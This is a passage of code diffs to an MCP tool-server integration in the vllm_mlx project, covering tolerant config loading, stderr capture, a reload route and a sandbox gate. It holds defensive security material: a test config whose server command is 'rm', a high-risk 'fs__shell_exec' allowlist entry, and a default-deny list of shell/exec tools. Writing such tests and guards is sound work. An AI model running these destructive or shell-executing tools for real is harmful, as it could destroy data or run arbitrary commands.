+    set_sandbox(ToolSandbox(allowed_high_risk_tools={"fs__shell_exec"}))
+    manager = _RecordingManager()
+    server_module._mcp_manager = manager
+    server_module._sync_config()
+
+    body = client.post(
+        "/v1/mcp/execute",
+        json={"tool_name": "fs__shell_exec", "arguments": {}},
+    ).json()
+
+    assert body["is_error"] is False
+    assert manager.executed == ["fs__shell_exec"]
+
+
+# ---------------------------------------------------------------------------
+# Captured-stderr file descriptor is released
+# ---------------------------------------------------------------------------
+
+
+def test_disconnect_closes_the_captured_stderr_file():
+    """Each reload disconnects every client; a leaked temp fd per cycle adds up."""
+    import tempfile
+
+    from vllm_mlx.mcp.client import MCPClient, MCPServerState
+    from vllm_mlx.mcp.types import MCPServerConfig
+
+    cfg = MCPServerConfig(
+        name="s",
+        transport="stdio",
+        command="python3",
+        skip_security_validation=True,
+    )
+    client_obj = MCPClient(cfg)
+    handle = tempfile.TemporaryFile(mode="w+", encoding="utf-8")
+    client_obj._stderr_file = handle
+    # Pretend we are connected so ``disconnect`` runs its body.
+    client_obj._state = MCPServerState.CONNECTED
+
+    asyncio.run(client_obj.disconnect())
+
+    assert client_obj._stderr_file is None
+    assert handle.closed

--- a/tests/test_mcp_security.py
+++ b/tests/test_mcp_security.py
@@ -811,6 +811,15 @@ class TestConfigDiscoveryNoCWD:
         from vllm_mlx.mcp.config import CONFIG_SEARCH_PATHS, load_mcp_config
 
         monkeypatch.chdir(tmp_path)
+        # Isolate HOME too. The assertion below is "CWD was not searched", and
+        # it reads that off an EMPTY result — which also requires the
+        # ~/.config search paths to miss. Since the desktop app began writing
+        # ~/.config/rapid-mlx/mcp.json (issue #1716), any developer who has
+        # used Connectors has a real config there, and this test failed on
+        # their machine for a reason that has nothing to do with what it
+        # tests. Point HOME at the empty tmp dir so the outcome depends only
+        # on CWD discovery.
+        monkeypatch.setenv("HOME", str(tmp_path))
         # Plant a malicious-looking config in CWD
         (tmp_path / "mcp.json").write_text(
             '{"servers": {"evil": {"transport": "stdio", "command": "rm"}}}'

--- a/tests/test_routes.py
+++ b/tests/test_routes.py
@@ -1452,6 +1452,9 @@ class TestMCPRoutes:
 
         mcp = MagicMock()
         mcp.execute_tool = AsyncMock(return_value=result)
+        # The route resolves (server, tool) to gate the call through the
+        # sandbox before dispatch; a benign tool passes and still runs.
+        mcp.resolve_tool_target = MagicMock(return_value=("srv", "test_tool"))
 
         with (
             patch.object(get_config(), "mcp_manager", mcp),

--- a/tests/test_server_load_model_order.py
+++ b/tests/test_server_load_model_order.py
@@ -664,8 +664,13 @@ async def test_init_mcp_syncs_config_into_cfg(monkeypatch):
 
     mock_config = MagicMock()
     mock_config.allowed_high_risk_tools = []
+    # ``_start_mcp`` now loads tolerantly and reads ``config.rejected``; the
+    # mock has to accept the ``tolerant`` kwarg and expose an iterable.
+    mock_config.rejected = []
 
-    monkeypatch.setattr(mcp_module, "load_mcp_config", lambda _path: mock_config)
+    monkeypatch.setattr(
+        mcp_module, "load_mcp_config", lambda _path, tolerant=False: mock_config
+    )
     monkeypatch.setattr(mcp_module, "MCPClientManager", lambda _cfg: mock_manager)
     monkeypatch.setattr(mcp_module, "ToolExecutor", lambda _mgr: mock_executor)
     monkeypatch.setattr(mcp_module, "set_sandbox", MagicMock())

--- a/vllm_mlx/api/models.py
+++ b/vllm_mlx/api/models.py
@@ -2503,6 +2503,14 @@ class MCPServersResponse(BaseModel):
     """Response for listing MCP servers."""
 
     servers: list[MCPServerInfo]
+    #: Issue #1716: why MCP is not running, when it is not. Distinguishes
+    #: "configured, all servers healthy, zero servers listed" from "MCP could
+    #: not start at all" — which look identical on an empty ``servers`` list
+    #: and need very different things said to the user.
+    error: str | None = None
+    #: True once a config path is known, whether or not it loaded. Lets a
+    #: client tell "no --mcp-config was passed" from "config present but bad".
+    configured: bool = False
 
 
 class MCPExecuteRequest(BaseModel):

--- a/vllm_mlx/config/server_config.py
+++ b/vllm_mlx/config/server_config.py
@@ -8,7 +8,7 @@ accessible from routes and middleware via `get_config()`.
 
 from __future__ import annotations
 
-from dataclasses import dataclass
+from dataclasses import dataclass, field
 from typing import Any
 
 # A real runtime import, deliberately. It used to drag the whole engine in
@@ -120,6 +120,13 @@ class ServerConfig:
     # --- MCP ---
     mcp_manager: Any = None
     mcp_executor: Any = None
+    # Issue #1716: why MCP is not up, when it is not. Non-None means init or
+    # reload failed; the server itself is unaffected.
+    mcp_init_error: str | None = None
+    # Server entries the tolerant config load dropped, as MCPRejectedServer.
+    mcp_rejected: list = field(default_factory=list)
+    # Path the config was loaded from, so a reload can re-read the same file.
+    mcp_config_path: str | None = None
 
     # --- Embeddings ---
     embedding_engine: Any = None

--- a/vllm_mlx/mcp/__init__.py
+++ b/vllm_mlx/mcp/__init__.py
@@ -41,6 +41,7 @@ from .security import (
 from .tools import format_tool_result, mcp_tool_to_openai, openai_call_to_mcp
 from .types import (
     MCPConfig,
+    MCPRejectedServer,
     MCPServerConfig,
     MCPServerStatus,
     MCPTool,
@@ -54,6 +55,7 @@ __all__ = [
     "MCPTool",
     "MCPToolResult",
     "MCPServerStatus",
+    "MCPRejectedServer",
     # Config
     "load_mcp_config",
     "validate_config",

--- a/vllm_mlx/mcp/client.py
+++ b/vllm_mlx/mcp/client.py
@@ -210,7 +210,10 @@ class MCPClient:
         )
 
         # Create stdio client context. ``errlog`` captures the child's stderr
-        # instead of letting it escape to ours — see ``_stderr_file``.
+        # instead of letting it escape to ours — see ``_stderr_file``. Close any
+        # prior handle first: a reconnect on the same client would otherwise
+        # leak the previous temp file's descriptor.
+        self._close_stderr_file()
         self._stderr_file = tempfile.TemporaryFile(mode="w+", encoding="utf-8")
         self._stdio_client = stdio_client(server_params, errlog=self._stderr_file)
         self._read, self._write = await self._stdio_client.__aenter__()
@@ -297,9 +300,21 @@ class MCPClient:
                 logger.warning(f"Error disconnecting from '{self.name}': {e}")
 
             finally:
+                # Close the captured-stderr temp file, or each reload
+                # (disconnect + reconnect every client) leaks one fd until GC.
+                self._close_stderr_file()
                 self._state = MCPServerState.DISCONNECTED
                 self._tools = []
                 logger.info(f"Disconnected from MCP server '{self.name}'")
+
+    def _close_stderr_file(self) -> None:
+        """Close and drop the captured-stderr temp file if one is open."""
+        if self._stderr_file is not None:
+            try:
+                self._stderr_file.close()
+            except Exception:  # pragma: no cover - defensive
+                pass
+            self._stderr_file = None
 
     async def call_tool(
         self,

--- a/vllm_mlx/mcp/client.py
+++ b/vllm_mlx/mcp/client.py
@@ -5,6 +5,7 @@ MCP client for connecting to individual MCP servers.
 
 import asyncio
 import logging
+import tempfile
 import time
 from typing import Any
 
@@ -62,6 +63,17 @@ class MCPClient:
         self._error: str | None = None
         self._last_connected: float | None = None
         self._lock = asyncio.Lock()
+        # Issue #1716: the stdio child's stderr. The MCP SDK's ``stdio_client``
+        # defaults ``errlog`` to our own stderr, so a server that dies on
+        # startup wrote its traceback somewhere the user never sees and the
+        # row reported only "Connection closed" — true, and useless. Capturing
+        # it lets the failure name its own cause.
+        #
+        # A real temp FILE, not ``io.StringIO``: the SDK hands ``errlog``
+        # to ``anyio.open_process(stderr=...)``, which needs an actual file
+        # descriptor. A StringIO gets as far as ``fileno()`` and raises —
+        # turning every connection error into the word "fileno".
+        self._stderr_file: tempfile.TemporaryFile | None = None  # type: ignore[valid-type]
 
     @property
     def name(self) -> str:
@@ -136,9 +148,44 @@ class MCPClient:
 
             except Exception as e:
                 self._state = MCPServerState.ERROR
-                self._error = str(e)
-                logger.error(f"Failed to connect to MCP server '{self.name}': {e}")
+                self._error = self._describe_failure(e)
+                logger.error(
+                    f"Failed to connect to MCP server '{self.name}': {self._error}"
+                )
                 return False
+
+    #: How much of the child's stderr to append to a connection error. Enough
+    #: for a Python traceback's final line, short enough for a settings row.
+    _STDERR_TAIL_CHARS = 400
+
+    def _describe_failure(self, exc: Exception) -> str:
+        """Build the error string the UI shows for a failed connection.
+
+        Issue #1716: the exception alone is frequently content-free. A stdio
+        server that dies during import raises ``ClosedResourceError`` here,
+        which renders as "Connection closed" — accurate, and useless to
+        someone trying to fix it. The reason is in the child's stderr, which
+        ``_connect_stdio`` now captures. Appending its tail turns the row from
+        "it didn't work" into the actual ImportError / missing-module /
+        bad-argument line the user needs.
+        """
+        base = str(exc) or type(exc).__name__
+        tail = ""
+        if self._stderr_file is not None:
+            try:
+                self._stderr_file.seek(0)
+                tail = self._stderr_file.read().strip()
+            except Exception:  # pragma: no cover - defensive
+                tail = ""
+        if not tail:
+            return base
+        # Last non-empty line: for a traceback that's the exception line, which
+        # is the one that names the cause.
+        last = tail.splitlines()[-1].strip()
+        if len(last) > self._STDERR_TAIL_CHARS:
+            last = last[: self._STDERR_TAIL_CHARS] + "…"
+        # Don't repeat ourselves when the exception already said it.
+        return last if last in base else f"{base} — {last}"
 
     async def _connect_stdio(self):
         """Connect via stdio transport."""
@@ -162,8 +209,10 @@ class MCPClient:
             env=self.config.env,
         )
 
-        # Create stdio client context
-        self._stdio_client = stdio_client(server_params)
+        # Create stdio client context. ``errlog`` captures the child's stderr
+        # instead of letting it escape to ours — see ``_stderr_file``.
+        self._stderr_file = tempfile.TemporaryFile(mode="w+", encoding="utf-8")
+        self._stdio_client = stdio_client(server_params, errlog=self._stderr_file)
         self._read, self._write = await self._stdio_client.__aenter__()
 
         # Create session

--- a/vllm_mlx/mcp/client.py
+++ b/vllm_mlx/mcp/client.py
@@ -148,7 +148,12 @@ class MCPClient:
 
             except Exception as e:
                 self._state = MCPServerState.ERROR
+                # ``_describe_failure`` reads the captured stderr, so close it
+                # only after. A failed connect never reaches ``disconnect`` on
+                # its own (the manager just sees ``False``), so without this the
+                # temp file's descriptor leaks on every startup failure.
                 self._error = self._describe_failure(e)
+                self._close_stderr_file()
                 logger.error(
                     f"Failed to connect to MCP server '{self.name}': {self._error}"
                 )

--- a/vllm_mlx/mcp/config.py
+++ b/vllm_mlx/mcp/config.py
@@ -9,7 +9,7 @@ import os
 from pathlib import Path
 from typing import Any
 
-from .types import MCPConfig, MCPServerConfig, select_server_map
+from .types import MCPConfig, MCPRejectedServer, MCPServerConfig, select_server_map
 
 logger = logging.getLogger(__name__)
 
@@ -35,7 +35,9 @@ CONFIG_ENV_VAR = "RAPID_MLX_MCP_CONFIG"
 CONFIG_ENV_VAR_LEGACY = "VLLM_MLX_MCP_CONFIG"
 
 
-def load_mcp_config(path: str | Path | None = None) -> MCPConfig:
+def load_mcp_config(
+    path: str | Path | None = None, tolerant: bool = False
+) -> MCPConfig:
     """
     Load MCP configuration from file.
 
@@ -51,6 +53,8 @@ def load_mcp_config(path: str | Path | None = None) -> MCPConfig:
 
     Args:
         path: Optional explicit path to config file
+        tolerant: Forwarded to :func:`validate_config` — drop and record bad
+            server entries rather than failing the whole load.
 
     Returns:
         MCPConfig object
@@ -84,7 +88,7 @@ def load_mcp_config(path: str | Path | None = None) -> MCPConfig:
     else:
         data = json.loads(content)
 
-    return validate_config(data)
+    return validate_config(data, tolerant=tolerant)
 
 
 def _find_config_file(
@@ -119,18 +123,28 @@ def _find_config_file(
     return None
 
 
-def validate_config(data: dict[str, Any]) -> MCPConfig:
+def validate_config(data: dict[str, Any], tolerant: bool = False) -> MCPConfig:
     """
     Validate and parse configuration dictionary.
 
     Args:
         data: Raw configuration dictionary
+        tolerant: When True, a server entry that fails to parse or fails
+            security validation is DROPPED and recorded in
+            ``MCPConfig.rejected`` instead of aborting the whole load.
+            Runtime callers (the serving path) want this — issue #1716: one
+            malformed entry taking every other connector down with it is
+            indistinguishable, from the UI, from "MCP is broken". Lint-style
+            callers (``rapid-mlx mcp validate``, tests) want the strict
+            default so a typo is a hard error.
 
     Returns:
         Validated MCPConfig object
 
     Raises:
-        ValueError: If configuration is invalid
+        ValueError: If configuration is invalid. Under ``tolerant`` this is
+            still raised for whole-file problems (non-dict root, bad
+            ``default_timeout``) — only per-server entries are demoted.
     """
     if not isinstance(data, dict):
         raise ValueError("MCP config must be a dictionary")
@@ -145,7 +159,16 @@ def validate_config(data: dict[str, Any]) -> MCPConfig:
     servers_data = select_server_map(data)
 
     servers = {}
+    rejected: list[MCPRejectedServer] = []
     for name, server_data in servers_data.items():
+        # Captured before construction: a rejected entry never becomes an
+        # MCPServerConfig, so this raw value is the only record of what the
+        # user actually declared.
+        declared_transport = "stdio"
+        if isinstance(server_data, dict):
+            raw = server_data.get("transport")
+            if isinstance(raw, str) and raw:
+                declared_transport = raw
         try:
             # Ensure name is set
             if isinstance(server_data, dict):
@@ -155,7 +178,25 @@ def validate_config(data: dict[str, Any]) -> MCPConfig:
             else:
                 raise ValueError(f"Server '{name}' config must be a dictionary")
         except TypeError as e:
+            if tolerant:
+                rejected.append(
+                    MCPRejectedServer(
+                        name,
+                        f"Invalid config for server '{name}': {e}",
+                        declared_transport,
+                    )
+                )
+                logger.error(f"Dropping MCP server '{name}': {e}")
+                continue
             raise ValueError(f"Invalid config for server '{name}': {e}")
+        except ValueError as e:
+            # ``MCPServerConfig.__post_init__`` raises this for a missing
+            # command/url AND for every security-validation rejection.
+            if tolerant:
+                rejected.append(MCPRejectedServer(name, str(e), declared_transport))
+                logger.error(f"Dropping MCP server '{name}': {e}")
+                continue
+            raise
 
     default_timeout = data.get("default_timeout", 30.0)
     if not isinstance(default_timeout, (int, float)) or default_timeout <= 0:
@@ -171,6 +212,7 @@ def validate_config(data: dict[str, Any]) -> MCPConfig:
         servers=servers,
         default_timeout=default_timeout,
         allowed_high_risk_tools=allowed_high_risk_tools,
+        rejected=rejected,
     )
 
 

--- a/vllm_mlx/mcp/manager.py
+++ b/vllm_mlx/mcp/manager.py
@@ -171,6 +171,23 @@ class MCPClientManager:
         """
         return self._clients.get(server_name)
 
+    def resolve_tool_target(self, full_name: str) -> tuple[str | None, str]:
+        """Resolve ``(server_name, bare_tool_name)`` for a namespaced name.
+
+        Returns ``(None, full_name)`` when no connected server owns the tool.
+        Public so the HTTP execute route can gate a call through the sandbox
+        against the SAME (server, tool) split :meth:`execute_tool` dispatches
+        on — otherwise the route would validate one name and run another.
+        """
+        server_name, tool_name, _ = openai_call_to_mcp(
+            {"function": {"name": full_name, "arguments": "{}"}}
+        )
+        # If no server prefix, try to find the tool by bare name.
+        if not server_name:
+            server_name = self._find_tool_server(full_name)
+            tool_name = full_name
+        return server_name, tool_name
+
     async def execute_tool(
         self,
         full_name: str,
@@ -188,15 +205,7 @@ class MCPClientManager:
         Returns:
             MCPToolResult with the result or error
         """
-        # Parse full name
-        server_name, tool_name, _ = openai_call_to_mcp(
-            {"function": {"name": full_name, "arguments": "{}"}}
-        )
-
-        # If no server prefix, try to find the tool
-        if not server_name:
-            server_name = self._find_tool_server(full_name)
-            tool_name = full_name
+        server_name, tool_name = self.resolve_tool_target(full_name)
 
         if not server_name:
             return MCPToolResult(

--- a/vllm_mlx/mcp/types.py
+++ b/vllm_mlx/mcp/types.py
@@ -141,6 +141,26 @@ class MCPServerConfig:
 
 
 @dataclass
+class MCPRejectedServer:
+    """A server entry that failed to parse or failed security validation.
+
+    Issue #1716: one bad entry used to abort the whole config load, which
+    read to the user as "all my connectors vanished". Tolerant loading keeps
+    the good entries and records the bad ones here so the reason survives all
+    the way to the UI instead of only reaching the server log.
+    """
+
+    name: str
+    error: str
+    #: Transport as DECLARED in the config, not as validated — the entry never
+    #: became an ``MCPServerConfig``, so this is the raw string the user wrote.
+    #: Reported as-is so the error row doesn't claim a transport the user
+    #: didn't choose; unparseable/absent falls back to the stdio default the
+    #: loader would itself have applied.
+    transport: str = "stdio"
+
+
+@dataclass
 class MCPConfig:
     """Root configuration for MCP client."""
 
@@ -150,6 +170,9 @@ class MCPConfig:
     # exec, system, run_command, subprocess) are blocked by default. Add the
     # full namespaced tool name (e.g. "filesystem__execute") here to opt-in.
     allowed_high_risk_tools: list[str] = field(default_factory=list)
+    # Entries dropped by a tolerant load. Empty under strict loading, which
+    # raises instead.
+    rejected: list[MCPRejectedServer] = field(default_factory=list)
 
     @classmethod
     def from_dict(cls, data: dict[str, Any]) -> "MCPConfig":

--- a/vllm_mlx/routes/mcp_routes.py
+++ b/vllm_mlx/routes/mcp_routes.py
@@ -12,9 +12,17 @@ from ..api.models import (
     MCPToolsResponse,
 )
 from ..config import get_config
-from ..middleware.auth import verify_api_key
+from ..middleware.auth import verify_api_key, verify_api_key_or_x_api_key
 
 router = APIRouter()
+
+# Control-plane route (``/v1/mcp/reload``). It re-reads the config file and
+# spawns whatever local processes it names, so it sits on the same gate the
+# other destructive routes use (``admin_router`` in ``routes/health.py``) —
+# Bearer OR ``x-api-key``, per the operator-intent revert of #728. Deliberately
+# NOT the internal-header gate that revert removed: reintroducing it here would
+# put this one route on a scheme nothing else in the tree uses.
+admin_router = APIRouter(dependencies=[Depends(verify_api_key_or_x_api_key)])
 
 
 @router.get("/v1/mcp/tools", dependencies=[Depends(verify_api_key)])
@@ -39,13 +47,43 @@ async def list_mcp_tools() -> MCPToolsResponse:
     return MCPToolsResponse(tools=tools, count=len(tools))
 
 
+def _rejected_server_infos() -> list[MCPServerInfo]:
+    """Render config entries the tolerant load dropped as error rows.
+
+    Issue #1716: a server rejected by security validation never becomes a
+    client, so it has no status to report and would simply be MISSING from
+    the list — the user sees the row they added silently disappear. Listing
+    it in ``error`` state with the validator's reason is what makes the
+    rejection actionable.
+    """
+    cfg = get_config()
+    return [
+        MCPServerInfo(
+            name=entry.name,
+            state="error",
+            transport=getattr(entry, "transport", "stdio"),
+            tools_count=0,
+            error=entry.error,
+        )
+        for entry in getattr(cfg, "mcp_rejected", []) or []
+    ]
+
+
 @router.get("/v1/mcp/servers", dependencies=[Depends(verify_api_key)])
 async def list_mcp_servers() -> MCPServersResponse:
     """Get status of all MCP servers."""
     cfg = get_config()
+    configured = getattr(cfg, "mcp_config_path", None) is not None
+    init_error = getattr(cfg, "mcp_init_error", None)
 
     if cfg.mcp_manager is None:
-        return MCPServersResponse(servers=[])
+        # Rejected entries still list — when the whole load failed there are
+        # none, and ``error`` carries the reason instead.
+        return MCPServersResponse(
+            servers=_rejected_server_infos(),
+            error=init_error,
+            configured=configured,
+        )
 
     servers = []
     for status in cfg.mcp_manager.get_server_status():
@@ -59,7 +97,13 @@ async def list_mcp_servers() -> MCPServersResponse:
             )
         )
 
-    return MCPServersResponse(servers=servers)
+    servers.extend(_rejected_server_infos())
+
+    return MCPServersResponse(
+        servers=servers,
+        error=init_error,
+        configured=configured,
+    )
 
 
 @router.get("/v1/mcp/status", dependencies=[Depends(verify_api_key)])
@@ -69,6 +113,25 @@ async def get_mcp_status() -> MCPServersResponse:
     The MCP tools guide documents ``/v1/mcp/status`` as the status endpoint,
     so this route prevents 404s for users following the docs.
     """
+    return await list_mcp_servers()
+
+
+@admin_router.post("/v1/mcp/reload")
+async def reload_mcp_servers() -> MCPServersResponse:
+    """Re-read the MCP config from disk and rebuild every connection.
+
+    Issue #1716: the config was read exactly once, at process start, so the
+    desktop app could only apply a connector edit by restarting the server —
+    a multi-GB model reload for a one-line JSON change. This tears the
+    manager down and brings it back from the same path.
+
+    Failure is reported in the response body (``error``), not as a 5xx: a
+    connector that won't start is a normal, user-fixable state, and the
+    caller still wants the per-server rows to render alongside the reason.
+    """
+    from ..server import reload_mcp
+
+    await reload_mcp()
     return await list_mcp_servers()
 
 

--- a/vllm_mlx/routes/mcp_routes.py
+++ b/vllm_mlx/routes/mcp_routes.py
@@ -12,6 +12,7 @@ from ..api.models import (
     MCPToolsResponse,
 )
 from ..config import get_config
+from ..mcp.security import MCPSecurityError, get_sandbox
 from ..middleware.auth import verify_api_key, verify_api_key_or_x_api_key
 
 router = APIRouter()
@@ -144,6 +145,27 @@ async def execute_mcp_tool(request: MCPExecuteRequest) -> MCPExecuteResponse:
         raise HTTPException(
             status_code=503, detail="MCP not configured. Start server with --mcp-config"
         )
+
+    # Server-side sandbox gate. The in-process tool loop runs this through
+    # ``ToolExecutor``; this route does not, so without an explicit check the
+    # default-deny on high-risk tools (shell/exec/eval), the argument-pattern
+    # scrub, and the ``allowed_high_risk_tools`` allowlist wired up in
+    # ``_start_mcp`` would all be inert here and the UI approval click would be
+    # the sole gate (issue #1716). Validate against the SAME (server, tool)
+    # split ``execute_tool`` will dispatch on.
+    server_name, bare_tool = cfg.mcp_manager.resolve_tool_target(request.tool_name)
+    if server_name is not None:
+        try:
+            get_sandbox().validate_tool_execution(
+                bare_tool, server_name, request.arguments
+            )
+        except MCPSecurityError as exc:
+            return MCPExecuteResponse(
+                tool_name=request.tool_name,
+                content=None,
+                is_error=True,
+                error_message=str(exc),
+            )
 
     result = await cfg.mcp_manager.execute_tool(
         request.tool_name,

--- a/vllm_mlx/server.py
+++ b/vllm_mlx/server.py
@@ -240,6 +240,10 @@ _mcp_init_error: str | None = None
 _mcp_config_path: str | None = None
 # Per-server entries dropped by the tolerant config load, with their reasons.
 _mcp_rejected: list = []
+# Serializes concurrent ``reload_mcp`` calls: two overlapping reloads both
+# tearing down and rebuilding the global manager would corrupt each other's
+# state. Created lazily (module import must not touch the event loop).
+_mcp_reload_lock: "asyncio.Lock | None" = None
 
 # Global embedding engine (lazy loaded)
 _embedding_engine = None
@@ -2147,20 +2151,34 @@ async def _start_mcp(config_path: str) -> None:
     for entry in _mcp_rejected:
         logger.warning(f"MCP server '{entry.name}' rejected: {entry.error}")
 
-    _mcp_manager = MCPClientManager(config)
-    await _mcp_manager.start()
+    # Build locally and publish only after a clean start. ``start()`` connects
+    # child processes; if it (or the wiring below) raises with some already up,
+    # stopping the local manager first is what keeps a failed init from
+    # orphaning subprocesses under a discarded, never-published manager.
+    manager = MCPClientManager(config)
+    try:
+        await manager.start()
 
-    # Wire allowed_high_risk_tools from config into the global sandbox so
-    # default-deny on shell/exec/eval tools respects the user's allowlist.
-    set_sandbox(
-        ToolSandbox(
-            allowed_high_risk_tools=set(config.allowed_high_risk_tools),
+        # Wire allowed_high_risk_tools from config into the global sandbox so
+        # default-deny on shell/exec/eval tools respects the user's allowlist.
+        set_sandbox(
+            ToolSandbox(
+                allowed_high_risk_tools=set(config.allowed_high_risk_tools),
+            )
         )
-    )
 
-    _mcp_executor = ToolExecutor(_mcp_manager)
+        executor = ToolExecutor(manager)
+    except Exception:
+        try:
+            await manager.stop()
+        except Exception as stop_err:  # pragma: no cover - defensive
+            logger.warning(f"Error stopping half-started MCP manager: {stop_err}")
+        raise
 
-    logger.info(f"MCP initialized with {len(_mcp_manager.get_all_tools())} tools")
+    _mcp_manager = manager
+    _mcp_executor = executor
+
+    logger.info(f"MCP initialized with {len(manager.get_all_tools())} tools")
 
 
 async def init_mcp(config_path: str):
@@ -2208,36 +2226,49 @@ async def reload_mcp(config_path: str | None = None) -> str | None:
     Returns ``None`` on success, or the error string on failure. The old
     manager is stopped either way — a half-torn-down manager whose child
     processes are still alive is worse than no manager.
+
+    A ``/v1/mcp/execute`` call that captured the old manager just before a
+    reload can still run against it as it is torn down; that resolves to a
+    clean "server not connected" error result (the client reports
+    ``is_connected == False``), not a crash. Concurrent reloads, which WOULD
+    corrupt the shared globals, are serialized by ``_mcp_reload_lock``.
     """
     global _mcp_manager, _mcp_executor, _mcp_init_error, _mcp_config_path
+    global _mcp_reload_lock
 
-    path = config_path or _mcp_config_path
-    if path is None:
-        _mcp_init_error = "No MCP config path known — start the server with --mcp-config"
-        _sync_config()
-        return _mcp_init_error
+    if _mcp_reload_lock is None:
+        _mcp_reload_lock = asyncio.Lock()
 
-    _mcp_config_path = path
+    async with _mcp_reload_lock:
+        path = config_path or _mcp_config_path
+        if path is None:
+            _mcp_init_error = (
+                "No MCP config path known — start the server with --mcp-config"
+            )
+            _sync_config()
+            return _mcp_init_error
 
-    if _mcp_manager is not None:
-        try:
-            await _mcp_manager.stop()
-        except Exception as e:  # pragma: no cover - defensive
-            logger.warning(f"Error stopping MCP manager during reload: {e}")
-    _mcp_manager = None
-    _mcp_executor = None
+        _mcp_config_path = path
 
-    _mcp_init_error = None
-    try:
-        await _start_mcp(path)
-    except Exception as e:
-        _mcp_init_error = f"Failed to reload MCP: {e}"
-        logger.error(_mcp_init_error)
+        if _mcp_manager is not None:
+            try:
+                await _mcp_manager.stop()
+            except Exception as e:  # pragma: no cover - defensive
+                logger.warning(f"Error stopping MCP manager during reload: {e}")
         _mcp_manager = None
         _mcp_executor = None
 
-    _sync_config()
-    return _mcp_init_error
+        _mcp_init_error = None
+        try:
+            await _start_mcp(path)
+        except Exception as e:
+            _mcp_init_error = f"Failed to reload MCP: {e}"
+            logger.error(_mcp_init_error)
+            _mcp_manager = None
+            _mcp_executor = None
+
+        _sync_config()
+        return _mcp_init_error
 
 
 # =============================================================================

--- a/vllm_mlx/server.py
+++ b/vllm_mlx/server.py
@@ -232,6 +232,14 @@ _generation_config_sampling: dict[str, float | int] | None = None
 # Global MCP manager
 _mcp_manager = None
 _mcp_executor = None
+# Issue #1716: MCP is optional and must never be able to fail server boot.
+# When init/reload fails these carry the reason (and the path to retry from)
+# out to ``/v1/mcp/servers`` so the desktop app can render something the user
+# can act on instead of an empty connector list.
+_mcp_init_error: str | None = None
+_mcp_config_path: str | None = None
+# Per-server entries dropped by the tolerant config load, with their reasons.
+_mcp_rejected: list = []
 
 # Global embedding engine (lazy loaded)
 _embedding_engine = None
@@ -2099,6 +2107,9 @@ def _sync_config() -> None:
     cfg.pin_system_prompt = _pin_system_prompt
     cfg.pinned_system_prompt_hash = _pinned_system_prompt_hash
     cfg.mcp_executor = _mcp_executor
+    cfg.mcp_init_error = _mcp_init_error
+    cfg.mcp_rejected = _mcp_rejected
+    cfg.mcp_config_path = _mcp_config_path
     cfg.model_registry = _model_registry
     cfg.enable_audio_lane = _enable_audio_lane
 
@@ -2111,46 +2122,122 @@ from .routes.anthropic import _emit_content_pieces  # noqa: F401, E402
 # =============================================================================
 
 
+async def _start_mcp(config_path: str) -> None:
+    """Build a manager/executor pair from ``config_path`` and publish them.
+
+    Raises on failure. Callers decide whether that is fatal —
+    :func:`init_mcp` (boot) does not, :func:`reload_mcp` (explicit user
+    action) reports it back over HTTP.
+    """
+    global _mcp_manager, _mcp_executor, _mcp_rejected
+
+    from vllm_mlx.mcp import (
+        MCPClientManager,
+        ToolExecutor,
+        ToolSandbox,
+        load_mcp_config,
+        set_sandbox,
+    )
+
+    # Issue #1716: tolerant load. A single entry that fails security
+    # validation is dropped and reported through ``/v1/mcp/servers`` rather
+    # than taking every other connector down with it.
+    config = load_mcp_config(config_path, tolerant=True)
+    _mcp_rejected = list(config.rejected)
+    for entry in _mcp_rejected:
+        logger.warning(f"MCP server '{entry.name}' rejected: {entry.error}")
+
+    _mcp_manager = MCPClientManager(config)
+    await _mcp_manager.start()
+
+    # Wire allowed_high_risk_tools from config into the global sandbox so
+    # default-deny on shell/exec/eval tools respects the user's allowlist.
+    set_sandbox(
+        ToolSandbox(
+            allowed_high_risk_tools=set(config.allowed_high_risk_tools),
+        )
+    )
+
+    _mcp_executor = ToolExecutor(_mcp_manager)
+
+    logger.info(f"MCP initialized with {len(_mcp_manager.get_all_tools())} tools")
+
+
 async def init_mcp(config_path: str):
-    """Initialize MCP manager from config file."""
-    global _mcp_manager, _mcp_executor
+    """Initialize MCP manager from config file — never fatal.
+
+    Issue #1716: this used to re-raise, and it runs inside the lifespan
+    startup, so a missing config file or one unstartable server took the
+    WHOLE server down — no chat, no models, no error the desktop app could
+    render. MCP is an optional capability; failing to bring it up must
+    degrade to "no connectors" rather than "no server". The reason is kept in
+    ``_mcp_init_error`` and surfaced on ``/v1/mcp/servers`` so the app can
+    show something actionable.
+    """
+    global _mcp_manager, _mcp_executor, _mcp_init_error, _mcp_config_path
+
+    _mcp_config_path = config_path
+    _mcp_init_error = None
 
     try:
-        from vllm_mlx.mcp import (
-            MCPClientManager,
-            ToolExecutor,
-            ToolSandbox,
-            load_mcp_config,
-            set_sandbox,
-        )
-
-        config = load_mcp_config(config_path)
-        _mcp_manager = MCPClientManager(config)
-        await _mcp_manager.start()
-
-        # Wire allowed_high_risk_tools from config into the global sandbox so
-        # default-deny on shell/exec/eval tools respects the user's allowlist.
-        set_sandbox(
-            ToolSandbox(
-                allowed_high_risk_tools=set(config.allowed_high_risk_tools),
-            )
-        )
-
-        _mcp_executor = ToolExecutor(_mcp_manager)
-
-        logger.info(f"MCP initialized with {len(_mcp_manager.get_all_tools())} tools")
-
-        # Sync the newly-created manager/executor into the ServerConfig
-        # singleton so MCP routes see them. Keeping this inside init_mcp()
-        # means every code path that initializes MCP also publishes it to cfg.
-        _sync_config()
-
+        await _start_mcp(config_path)
     except ImportError:
-        logger.error("MCP SDK not installed. Install with: pip install mcp")
-        raise
+        _mcp_init_error = "MCP SDK not installed. Install with: pip install mcp"
+        logger.error(_mcp_init_error)
+        _mcp_manager = None
+        _mcp_executor = None
     except Exception as e:
-        logger.error(f"Failed to initialize MCP: {e}")
-        raise
+        _mcp_init_error = f"Failed to initialize MCP: {e}"
+        logger.error(_mcp_init_error)
+        _mcp_manager = None
+        _mcp_executor = None
+
+    # Sync whatever we ended up with (including the None/error case) into the
+    # ServerConfig singleton so MCP routes see it. Keeping this inside
+    # init_mcp() means every code path that initializes MCP also publishes it.
+    _sync_config()
+
+
+async def reload_mcp(config_path: str | None = None) -> str | None:
+    """Tear down the running MCP manager and rebuild it from disk.
+
+    Backs ``POST /v1/mcp/reload`` (issue #1716): the desktop app edits
+    ``mcp.json`` and needs the change to take effect without restarting the
+    model, which would mean a multi-GB reload for a one-line config edit.
+
+    Returns ``None`` on success, or the error string on failure. The old
+    manager is stopped either way — a half-torn-down manager whose child
+    processes are still alive is worse than no manager.
+    """
+    global _mcp_manager, _mcp_executor, _mcp_init_error, _mcp_config_path
+
+    path = config_path or _mcp_config_path
+    if path is None:
